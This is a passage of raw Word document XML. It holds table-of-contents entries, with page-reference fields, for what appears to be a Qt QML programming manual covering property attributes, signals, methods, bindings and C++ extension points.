            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Assigning Values to Property Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605621 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>321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22" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Value Assignment on Initialization</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605622 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>321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23" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Imperative Value Assignment</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605623 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>322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24" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Static Values and Binding Expression Values</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605624 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>322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25" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Type Safety</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605625 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>323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26" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Special Property Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605626 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>323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27" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Object List Property Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605627 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>323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28" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Grouped Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605628 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>325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29" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Aliases</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605629 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>325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30" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Considerations for Property Aliases</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605630 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>326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31" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Default Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605631 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>327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32" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Read-Only Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605632 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>328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33" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Modifier Objects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605633 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>329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34" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605634 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>329</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35" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Signal Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605635 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>330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36" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Change Signals</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605636 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>330</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37" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal Handler Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605637 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>330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38" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Change Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605638 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>331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39" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Method Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605639 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>332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40" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Method Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605640 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>332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41" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Attached Properties and Attached Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605641 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>333</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42" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>A Note About Accessing Attached Properties and Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605642 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>335</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643" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Binding QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605643 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>336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44" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Binding to an inaccessible property</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605644 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>336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45" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Conditional bindings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605645 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>336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46" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>C++ Extension Points Provided By Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605646 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>337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47" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>User-Defined QQuickItem-Derived Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
